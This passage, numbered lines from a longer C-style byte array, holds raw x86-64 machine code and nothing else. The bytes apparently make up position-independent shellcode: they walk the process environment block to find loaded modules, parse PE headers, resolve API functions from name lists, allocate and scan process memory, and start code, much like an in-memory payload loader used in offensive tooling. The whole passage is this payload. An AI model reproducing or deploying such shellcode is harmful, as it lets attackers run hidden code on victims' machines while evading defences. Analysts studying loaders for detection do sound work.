1386 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xf0,
1387 0x03, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b,
1388 0x45, 0x70, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xb0, 0x04, 0x00, 0x00,
1389 0xeb, 0x14, 0x83, 0xad, 0xa8, 0x04, 0x00, 0x00, 0x01, 0x83, 0xbd, 0xa8,
1390 0x04, 0x00, 0x00, 0x00, 0x0f, 0x85, 0x57, 0xff, 0xff, 0xff, 0x48, 0x83,
1391 0xbd, 0xb0, 0x04, 0x00, 0x00, 0x00, 0x0f, 0x84, 0xe9, 0x01, 0x00, 0x00,
1392 0x48, 0x8b, 0x85, 0x18, 0x05, 0x00, 0x00, 0x0f, 0xb6, 0x80, 0x0c, 0x04,
1393 0x00, 0x00, 0x84, 0xc0, 0x74, 0x6f, 0x48, 0x8b, 0x85, 0x18, 0x05, 0x00,
1394 0x00, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x26, 0x48,
1395 0x8b, 0x85, 0x18, 0x05, 0x00, 0x00, 0x48, 0x05, 0x0c, 0x04, 0x00, 0x00,
1396 0x48, 0x8d, 0x95, 0xa0, 0x00, 0x00, 0x00, 0x49, 0x89, 0xd0, 0x48, 0x89,
1397 0xc2, 0x48, 0x8b, 0x8d, 0x10, 0x05, 0x00, 0x00, 0xe8, 0xd8, 0xc9, 0xff,
1398 0xff, 0x48, 0x8b, 0x85, 0x18, 0x05, 0x00, 0x00, 0x8b, 0x80, 0x0c, 0x05,
1399 0x00, 0x00, 0x85, 0xc0, 0x74, 0x09, 0x48, 0x8d, 0x85, 0xa0, 0x00, 0x00,
1400 0x00, 0xeb, 0x0d, 0x48, 0x8b, 0x85, 0x18, 0x05, 0x00, 0x00, 0x48, 0x05,
1401 0x0c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xb0, 0x04, 0x00, 0x00, 0x48,
1402 0x89, 0xc1, 0xff, 0xd2, 0xe9, 0x69, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
1403 0xb0, 0x04, 0x00, 0x00, 0x48, 0x89, 0x85, 0x98, 0x04, 0x00, 0x00, 0x48,
1404 0x8b, 0x85, 0x98, 0x04, 0x00, 0x00, 0xff, 0xd0, 0xe9, 0x4d, 0x01, 0x00,
1405 0x00, 0x48, 0x8b, 0x85, 0x18, 0x05, 0x00, 0x00, 0x0f, 0xb6, 0x80, 0x0c,
1406 0x04, 0x00, 0x00, 0x84, 0xc0, 0x74, 0x3c, 0x48, 0x8b, 0x85, 0x18, 0x05,
1407 0x00, 0x00, 0x48, 0x05, 0x0c, 0x04, 0x00, 0x00, 0x48, 0x8d, 0x95, 0xa0,
1408 0x00, 0x00, 0x00, 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d,
1409 0x10, 0x05, 0x00, 0x00, 0xe8, 0x4c, 0xc9, 0xff, 0xff, 0x48, 0x8d, 0x85,
1410 0xa0, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0x10, 0x05,
1411 0x00, 0x00, 0xe8, 0x3b, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x18, 0x05,
1412 0x00, 0x00, 0x8b, 0x40, 0x04, 0x85, 0xc0, 0x0f, 0x84, 0xb5, 0x00, 0x00,
1413 0x00, 0x48, 0x8d, 0x85, 0xa8, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x90,
1414 0x04, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24, 0x58, 0x48, 0xc7, 0x44, 0x24,
1415 0x50, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x48, 0x00, 0x00,
1416 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x40, 0x00, 0x00, 0x00, 0x00, 0x48,
1417 0xc7, 0x44, 0x24, 0x38, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x30,
1418 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x28, 0x00, 0x00, 0x00,
1419 0x00, 0x48, 0x8b, 0x95, 0x10, 0x04, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24,
1420 0x20, 0x49, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0x41, 0xb8, 0x00, 0x00,
1421 0x00, 0x00, 0xba, 0xff, 0xff, 0x1f, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x0b,
1422 0x2b, 0x00, 0x00, 0x89, 0x85, 0x54, 0x04, 0x00, 0x00, 0x83, 0xbd, 0x54,
1423 0x04, 0x00, 0x00, 0x00, 0x78, 0x70, 0x48, 0x8b, 0x85, 0xa8, 0x02, 0x00,
1424 0x00, 0x48, 0x8b, 0x95, 0x90, 0x04, 0x00, 0x00, 0x49, 0x89, 0xd1, 0x41,
1425 0xb8, 0x00, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89,
1426 0xc1, 0xe8, 0xa5, 0x29, 0x00, 0x00, 0x89, 0x85, 0x54, 0x04, 0x00, 0x00,
1427 0x83, 0xbd, 0x54, 0x04, 0x00, 0x00, 0x00, 0x79, 0x3d, 0xe9, 0xfa, 0x00,
1428 0x00, 0x00, 0xc7, 0x85, 0xc8, 0x03, 0x00, 0x00, 0x30, 0x00, 0x00, 0x00,
1429 0x8b, 0x85, 0xc8, 0x03, 0x00, 0x00, 0x65, 0x48, 0x8b, 0x00, 0x48, 0x89,
1430 0x85, 0xc0, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x03, 0x00, 0x00,
1431 0x48, 0x8b, 0x40, 0x60, 0x48, 0x8b, 0x95, 0x10, 0x04, 0x00, 0x00, 0x48,
1432 0x89, 0xc1, 0xff, 0xd2, 0xeb, 0x04, 0x90, 0xeb, 0x01, 0x90, 0x48, 0x8b,
1433 0x45, 0x70, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0xb5, 0x00, 0x00, 0x00, 0x48,
1434 0xc7, 0x45, 0x58, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x4d, 0x58, 0x48,
1435 0x8d, 0x85, 0xb8, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x90, 0x04, 0x00,
1436 0x00, 0x48, 0x89, 0x54, 0x24, 0x20, 0x41, 0xb9, 0x00, 0x80, 0x00, 0x00,
1437 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc2, 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff,
1438 0xff, 0xe8, 0xc1, 0x29, 0x00, 0x00, 0x89, 0x85, 0x54, 0x04, 0x00, 0x00,
1439 0x83, 0xbd, 0x54, 0x04, 0x00, 0x00, 0x00, 0x78, 0x6b, 0x48, 0x8b, 0x45,
1440 0x70, 0x48, 0x8b, 0x95, 0x90, 0x04, 0x00, 0x00, 0x49, 0x89, 0xd0, 0x48,
1441 0x89, 0xc2, 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8, 0x6b, 0x28,
1442 0x00, 0x00, 0x89, 0x85, 0x54, 0x04, 0x00, 0x00, 0x83, 0xbd, 0x54, 0x04,
1443 0x00, 0x00, 0x00, 0x78, 0x42, 0x48, 0x8b, 0x85, 0x80, 0x00, 0x00, 0x00,
1444 0x48, 0x8b, 0x95, 0x90, 0x04, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x9a,
1445 0x28, 0x00, 0x00, 0xeb, 0x2b, 0x90, 0xeb, 0x28, 0x90, 0xeb, 0x25, 0x90,
1446 0xeb, 0x22, 0x90, 0xeb, 0x1f, 0x90, 0xeb, 0x1c, 0x90, 0xeb, 0x19, 0x90,
1447 0xeb, 0x16, 0x90, 0xeb, 0x13, 0x90, 0xeb, 0x10, 0x90, 0xeb, 0x0d, 0x90,
1448 0xeb, 0x0a, 0x90, 0xeb, 0x07, 0x90, 0xeb, 0x04, 0x90, 0xeb, 0x01, 0x90,
1449 0x48, 0x81, 0xc4, 0x70, 0x05, 0x00, 0x00, 0x5e, 0x5f, 0x5d, 0xc3, 0x55,
1450 0x48, 0x89, 0xe5, 0x48, 0x81, 0xec, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x89,
1451 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x05,
1452 0x44, 0x04, 0x00, 0x00, 0x48, 0x89, 0x45, 0xf8, 0xc7, 0x45, 0xf4, 0x00,
1453 0x00, 0x00, 0x00, 0xeb, 0x20, 0x8b, 0x45, 0xf4, 0x48, 0x63, 0xd0, 0x48,
1454 0x8b, 0x45, 0xf8, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x10, 0x8b, 0x45, 0xf4,
1455 0x48, 0x98, 0x88, 0x94, 0x05, 0x70, 0xff, 0xff, 0xff, 0x83, 0x45, 0xf4,
1456 0x01, 0x8b, 0x45, 0xf4, 0x48, 0x63, 0xd0, 0x48, 0x8b, 0x45, 0xf8, 0x48,
1457 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74, 0x1a, 0x8b, 0x45, 0xf4,
1458 0x48, 0x63, 0xd0, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x01, 0xd0, 0x0f, 0xb6,
1459 0x00, 0x3c, 0x3b, 0x74, 0x06, 0x83, 0x7d, 0xf4, 0x7f, 0x7e, 0xb2, 0x83,
1460 0x7d, 0xf4, 0x00, 0x74, 0x3c, 0x8b, 0x45, 0xf4, 0x48, 0x98, 0x48, 0x83,
1461 0xc0, 0x01, 0x48, 0x01, 0x45, 0xf8, 0x8b, 0x45, 0xf4, 0x48, 0x98, 0xc6,
1462 0x84, 0x05, 0x70, 0xff, 0xff, 0xff, 0x00, 0x48, 0x8b, 0x55, 0x18, 0x48,
1463 0x8d, 0x85, 0x70, 0xff, 0xff, 0xff, 0x48, 0x89, 0xc1, 0xe8, 0xba, 0x21,
1464 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x85, 0x6e, 0xff, 0xff, 0xff, 0xb8, 0x01,
1465 0x00, 0x00, 0x00, 0xeb, 0x06, 0x90, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48,
1466 0x81, 0xc4, 0xb0, 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5,
1467 0x48, 0x83, 0xc4, 0x80, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18,
1468 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x80, 0xf8, 0x01, 0x00, 0x00, 0x48,
1469 0x89, 0x45, 0xf8, 0x48, 0x83, 0x7d, 0x18, 0x00, 0x75, 0x07, 0xb8, 0x00,
1470 0x00, 0x00, 0x00, 0xeb, 0x73, 0x48, 0x8d, 0x4d, 0xc0, 0x48, 0x8b, 0x45,
1471 0x18, 0x48, 0x8b, 0x55, 0xf8, 0x48, 0x89, 0x54, 0x24, 0x30, 0x48, 0xc7,
1472 0x44, 0x24, 0x28, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x20,
1473 0x30, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc9, 0x41, 0xb8, 0x00, 0x00, 0x00,
1474 0x00, 0x48, 0x89, 0xc2, 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8,
1475 0x62, 0x28, 0x00, 0x00, 0x89, 0x45, 0xf4, 0x83, 0x7d, 0xf4, 0x00, 0x79,
1476 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x28, 0x8b, 0x45, 0xe0, 0x3d,
1477 0x00, 0x10, 0x00, 0x00, 0x75, 0x19, 0x8b, 0x45, 0xe8, 0x3d, 0x00, 0x00,
1478 0x02, 0x00, 0x75, 0x0f, 0x8b, 0x45, 0xe4, 0x83, 0xf8, 0x04, 0x75, 0x07,
1479 0xb8, 0x01, 0x00, 0x00, 0x00, 0xeb, 0x05, 0xb8, 0x00, 0x00, 0x00, 0x00,
1480 0x48, 0x83, 0xec, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x81, 0xec, 0x70, 0x01,
1481 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x89,
1482 0x8d, 0x00, 0x01, 0x00, 0x00, 0x48, 0x89, 0x95, 0x08, 0x01, 0x00, 0x00,
1483 0xc7, 0x85, 0xac, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45,
1484 0x3c, 0x30, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x3c, 0x65, 0x48, 0x8b, 0x00,
1485 0x48, 0x89, 0x45, 0x30, 0x48, 0x8b, 0x45, 0x30, 0x48, 0x8b, 0x40, 0x60,
1486 0x48, 0x89, 0x85, 0xa0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x00,
1487 0x00, 0x00, 0x48, 0x8b, 0x40, 0x20, 0x48, 0x89, 0x85, 0x98, 0x00, 0x00,
1488 0x00, 0x48, 0x8b, 0x85, 0x00, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x40,
1489 0x48, 0x8b, 0x95, 0x00, 0x01, 0x00, 0x00, 0x48, 0x81, 0xc2, 0x1c, 0x03,
1490 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, 0x85, 0x90, 0x00,
1491 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x00, 0x00, 0x00, 0x48, 0x89, 0x85,
1492 0x88, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x88, 0x00, 0x00, 0x00, 0x8b,
1493 0x40, 0x3c, 0x48, 0x63, 0xd0, 0x48, 0x8b, 0x85, 0x90, 0x00, 0x00, 0x00,
1494 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8b,
1495 0x85, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x50, 0x18, 0x48, 0x8b, 0x85,
1496 0x80, 0x00, 0x00, 0x00, 0x0f, 0xb7, 0x40, 0x14, 0x0f, 0xb7, 0xc0, 0x48,
1497 0x01, 0xd0, 0x48, 0x89, 0x45, 0x78, 0xc7, 0x85, 0xec, 0x00, 0x00, 0x00,
1498 0x00, 0x00, 0x00, 0x00, 0xe9, 0x9a, 0x00, 0x00, 0x00, 0x8b, 0x95, 0xec,
1499 0x00, 0x00, 0x00, 0x48, 0x89, 0xd0, 0x48, 0xc1, 0xe0, 0x02, 0x48, 0x01,
1500 0xd0, 0x48, 0xc1, 0xe0, 0x03, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0x78,
1501 0x48, 0x01, 0xd0, 0x8b, 0x10, 0x48, 0x8b, 0x85, 0x00, 0x01, 0x00, 0x00,
1502 0x48, 0x05, 0x14, 0x03, 0x00, 0x00, 0x8b, 0x00, 0x39, 0xc2, 0x75, 0x60,
1503 0x8b, 0x95, 0xec, 0x00, 0x00, 0x00, 0x48, 0x89, 0xd0, 0x48, 0xc1, 0xe0,
1504 0x02, 0x48, 0x01, 0xd0, 0x48, 0xc1, 0xe0, 0x03, 0x48, 0x89, 0xc2, 0x48,
1505 0x8b, 0x45, 0x78, 0x48, 0x01, 0xd0, 0x8b, 0x40, 0x0c, 0x89, 0xc2, 0x48,
1506 0x8b, 0x85, 0x90, 0x00, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85,
1507 0xe0, 0x00, 0x00, 0x00, 0x8b, 0x95, 0xec, 0x00, 0x00, 0x00, 0x48, 0x89,
1508 0xd0, 0x48, 0xc1, 0xe0, 0x02, 0x48, 0x01, 0xd0, 0x48, 0xc1, 0xe0, 0x03,
1509 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0x78, 0x48, 0x01, 0xd0, 0x8b, 0x40,
1510 0x08, 0xc1, 0xe8, 0x03, 0x89, 0x85, 0xe8, 0x00, 0x00, 0x00, 0xeb, 0x21,
1511 0x83, 0x85, 0xec, 0x00, 0x00, 0x00, 0x01, 0x48, 0x8b, 0x85, 0x80, 0x00,
1512 0x00, 0x00, 0x0f, 0xb7, 0x40, 0x06, 0x0f, 0xb7, 0xc0, 0x39, 0x85, 0xec,
1513 0x00, 0x00, 0x00, 0x0f, 0x82, 0x4c, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x85,
1514 0x00, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xa0, 0x00, 0x00, 0x00, 0xff,
1515 0xd0, 0x48, 0x89, 0x45, 0x70, 0xc7, 0x85, 0xec, 0x00, 0x00, 0x00, 0x00,
1516 0x00, 0x00, 0x00, 0xeb, 0x5c, 0x8b, 0x85, 0xec, 0x00, 0x00, 0x00, 0x48,
1517 0x8d, 0x14, 0xc5, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x00,
1518 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xd8, 0x00, 0x00, 0x00,
1519 0x48, 0x8b, 0x85, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x08, 0x48,
1520 0x39, 0x45, 0x70, 0x75, 0x24, 0x48, 0x8b, 0x85, 0x00, 0x01, 0x00, 0x00,
1521 0x4c, 0x8b, 0x80, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x08, 0x01,
1522 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1,
1523 0x41, 0xff, 0xd0, 0xeb, 0x16, 0x90, 0x83, 0x85, 0xec, 0x00, 0x00, 0x00,
1524 0x01, 0x8b, 0x85, 0xec, 0x00, 0x00, 0x00, 0x3b, 0x85, 0xe8, 0x00, 0x00,
1525 0x00, 0x72, 0x96, 0x48, 0x8b, 0x85, 0x00, 0x01, 0x00, 0x00, 0x48, 0x8b,
1526 0x80, 0x98, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0x45, 0x68, 0xc7,
1527 0x85, 0xec, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x84, 0x00,
1528 0x00, 0x00, 0x8b, 0x85, 0xec, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x14, 0xc5,
1529 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48,
1530 0x01, 0xd0, 0x48, 0x89, 0x45, 0x60, 0x48, 0x8b, 0x45, 0x60, 0x48, 0x8b,
1531 0x40, 0x08, 0x48, 0x39, 0x45, 0x68, 0x75, 0x52, 0x48, 0x8b, 0x85, 0x00,
1532 0x01, 0x00, 0x00, 0x4c, 0x8b, 0x88, 0xa8, 0x01, 0x00, 0x00, 0x48, 0x8b,
1533 0x95, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x45, 0x20, 0x41, 0xb8, 0x01,
1534 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd1, 0x8b, 0x85, 0xec,
1535 0x00, 0x00, 0x00, 0x48, 0x8d, 0x14, 0xc5, 0x00, 0x00, 0x00, 0x00, 0x48,
1536 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x0c, 0x02, 0x48, 0x8d,
1537 0x45, 0x20, 0x41, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8,
1538 0xd0, 0x1c, 0x00, 0x00, 0xeb, 0x1a, 0x90, 0x83, 0x85, 0xec, 0x00, 0x00,
1539 0x00, 0x01, 0x8b, 0x85, 0xec, 0x00, 0x00, 0x00, 0x3b, 0x85, 0xe8, 0x00,
1540 0x00, 0x00, 0x0f, 0x82, 0x6a, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x85, 0xa0,
1541 0x00, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x89, 0x45, 0x58, 0x48,
1542 0x8b, 0x45, 0x58, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x89, 0x85, 0xd0, 0x00,
1543 0x00, 0x00, 0xe9, 0x33, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x00, 0x01,
1544 0x00, 0x00, 0x48, 0x05, 0x44, 0x03, 0x00, 0x00, 0x48, 0x89, 0x85, 0xb8,
1545 0x00, 0x00, 0x00, 0xc7, 0x85, 0xb0, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00,
1546 0x00, 0xc7, 0x85, 0xb4, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7,
1547 0x85, 0xec, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x66, 0x8b,
1548 0x95, 0xec, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xb8, 0x00, 0x00, 0x00,
1549 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x3c, 0x77, 0x75, 0x0a, 0xc7, 0x85,
1550 0xb0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x95, 0xec, 0x00,
1551 0x00, 0x00, 0x48, 0x8b, 0x85, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x01, 0xd0,
1552 0x0f, 0xb6, 0x00, 0x3c, 0x70, 0x75, 0x0a, 0xc7, 0x85, 0xb4, 0x00, 0x00,
1553 0x00, 0x01, 0x00, 0x00, 0x00, 0x8b, 0x95, 0xec, 0x00, 0x00, 0x00, 0x48,
1554 0x8b, 0x85, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x10,
1555 0x8b, 0x85, 0xec, 0x00, 0x00, 0x00, 0x88, 0x54, 0x05, 0xa0, 0x83, 0x85,
1556 0xec, 0x00, 0x00, 0x00, 0x01, 0x8b, 0x95, 0xec, 0x00, 0x00, 0x00, 0x48,
1557 0x8b, 0x85, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00,
1558 0x84, 0xc0, 0x74, 0x24, 0x8b, 0x95, 0xec, 0x00, 0x00, 0x00, 0x48, 0x8b,
1559 0x85, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x3c,
1560 0x3b, 0x74, 0x0d, 0x83, 0xbd, 0xec, 0x00, 0x00, 0x00, 0x7f, 0x0f, 0x86,
1561 0x5f, 0xff, 0xff, 0xff, 0x83, 0xbd, 0xec, 0x00, 0x00, 0x00, 0x00, 0x0f,
1562 0x84, 0x3f, 0x01, 0x00, 0x00, 0x8b, 0x85, 0xec, 0x00, 0x00, 0x00, 0x83,
1563 0xc0, 0x01, 0x89, 0xc0, 0x48, 0x01, 0x85, 0xb8, 0x00, 0x00, 0x00, 0x8b,
1564 0x85, 0xec, 0x00, 0x00, 0x00, 0xc6, 0x44, 0x05, 0xa0, 0x00, 0x48, 0x8b,
1565 0x85, 0xd0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8d, 0x55,
1566 0xa0, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x49, 0x89, 0xd0, 0x48, 0x89,
1567 0xc2, 0x48, 0x8b, 0x8d, 0x00, 0x01, 0x00, 0x00, 0xe8, 0x2d, 0xc3, 0xff,
1568 0xff, 0x48, 0x89, 0x45, 0x50, 0x48, 0x83, 0x7d, 0x50, 0x00, 0x0f, 0x84,
1569 0xe6, 0x00, 0x00, 0x00, 0x83, 0xbd, 0xb0, 0x00, 0x00, 0x00, 0x00, 0x74,
1570 0x6b, 0x48, 0x8b, 0x45, 0x50, 0x48, 0x89, 0x85, 0xc8, 0x00, 0x00, 0x00,
1571 0x83, 0xbd, 0xb4, 0x00, 0x00, 0x00, 0x00, 0x74, 0x15, 0x48, 0x8b, 0x45,
1572 0x50, 0x48, 0x89, 0x45, 0x40, 0x48, 0x8b, 0x45, 0x40, 0xff, 0xd0, 0x48,
1573 0x89, 0x85, 0xc8, 0x00, 0x00, 0x00, 0x48, 0x83, 0xbd, 0xc8, 0x00, 0x00,
1574 0x00, 0x00, 0x0f, 0x84, 0x9f, 0xfe, 0xff, 0xff, 0x48, 0x8b, 0x85, 0xc8,
1575 0x00, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d,
1576 0x00, 0x01, 0x00, 0x00, 0xe8, 0xd7, 0xfa, 0xff, 0xff, 0x85, 0xc0, 0x0f,
1577 0x84, 0x7e, 0xfe, 0xff, 0xff, 0x48, 0x8b, 0x55, 0x28, 0x48, 0x8b, 0x85,
1578 0xc8, 0x00, 0x00, 0x00, 0x48, 0x89, 0x10, 0xe9, 0x6b, 0xfe, 0xff, 0xff,
1579 0x48, 0x8b, 0x45, 0x50, 0x48, 0x89, 0x85, 0xc0, 0x00, 0x00, 0x00, 0x83,
1580 0xbd, 0xb4, 0x00, 0x00, 0x00, 0x00, 0x74, 0x15, 0x48, 0x8b, 0x45, 0x50,
1581 0x48, 0x89, 0x45, 0x48, 0x48, 0x8b, 0x45, 0x48, 0xff, 0xd0, 0x48, 0x89,
1582 0x85, 0xc0, 0x00, 0x00, 0x00, 0x48, 0x83, 0xbd, 0xc0, 0x00, 0x00, 0x00,
1583 0x00, 0x0f, 0x84, 0x34, 0xfe, 0xff, 0xff, 0x48, 0x8b, 0x85, 0xc0, 0x00,
1584 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0x00,
1585 0x01, 0x00, 0x00, 0xe8, 0x6c, 0xfa, 0xff, 0xff, 0x85, 0xc0, 0x0f, 0x84,
1586 0x13, 0xfe, 0xff, 0xff, 0x48, 0x8b, 0x85, 0xd8, 0x00, 0x00, 0x00, 0x48,
1587 0x8b, 0x50, 0x08, 0x48, 0x8b, 0x85, 0xc0, 0x00, 0x00, 0x00, 0x48, 0x89,
1588 0x10, 0xe9, 0xf9, 0xfd, 0xff, 0xff, 0x90, 0xe9, 0xf3, 0xfd, 0xff, 0xff,
1589 0x90, 0x48, 0x8b, 0x85, 0xd0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48,
1590 0x89, 0x85, 0xd0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd0, 0x00, 0x00,
1591 0x00, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x85, 0xc0, 0x0f, 0x85, 0xb9, 0xfd,
1592 0xff, 0xff, 0xb8, 0x01, 0x00, 0x00, 0x00, 0x48, 0x81, 0xc4, 0x70, 0x01,
1593 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x81, 0xec, 0x80, 0x04, 0x00, 0x00,
1594 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x89, 0x8d, 0x10,
1595 0x04, 0x00, 0x00, 0x48, 0x89, 0x95, 0x18, 0x04, 0x00, 0x00, 0x48, 0x8b,
1596 0x85, 0x10, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xf8, 0x01, 0x00, 0x00,
1597 0x48, 0x89, 0x85, 0xf8, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x04,
1598 0x00, 0x00, 0x48, 0x8b, 0x80, 0x28, 0x0d, 0x00, 0x00, 0x48, 0x83, 0xc0,
1599 0x01, 0x48, 0x01, 0xc0, 0x48, 0x89, 0x45, 0xd8, 0x48, 0x8d, 0x4d, 0xd8,
1600 0x48, 0x8d, 0x85, 0xe8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xf8, 0x03,
1601 0x00, 0x00, 0x48, 0x89, 0x54, 0x24, 0x30, 0xc7, 0x44, 0x24, 0x28, 0x04,
1602 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x30, 0x00, 0x00, 0x49,
1603 0x89, 0xc9, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48,
1604 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8, 0xc8, 0x21, 0x00, 0x00, 0x89,
1605 0x85, 0xf4, 0x03, 0x00, 0x00, 0x83, 0xbd, 0xf4, 0x03, 0x00, 0x00, 0x00,
1606 0x0f, 0x88, 0xe4, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x04, 0x00,
1607 0x00, 0x48, 0x8b, 0x40, 0x60, 0x48, 0x8b, 0x95, 0x18, 0x04, 0x00, 0x00,
1608 0x8b, 0x92, 0x24, 0x05, 0x00, 0x00, 0x01, 0xd2, 0x41, 0x89, 0xd0, 0x48,
1609 0x8b, 0x95, 0xe8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0x18, 0x04, 0x00,
1610 0x00, 0x48, 0x81, 0xc1, 0x28, 0x05, 0x00, 0x00, 0x44, 0x89, 0x44, 0x24,
1611 0x28, 0x48, 0x89, 0x54, 0x24, 0x20, 0x41, 0xb9, 0xff, 0xff, 0xff, 0xff,
1612 0x49, 0x89, 0xc8, 0xba, 0x00, 0x00, 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00,
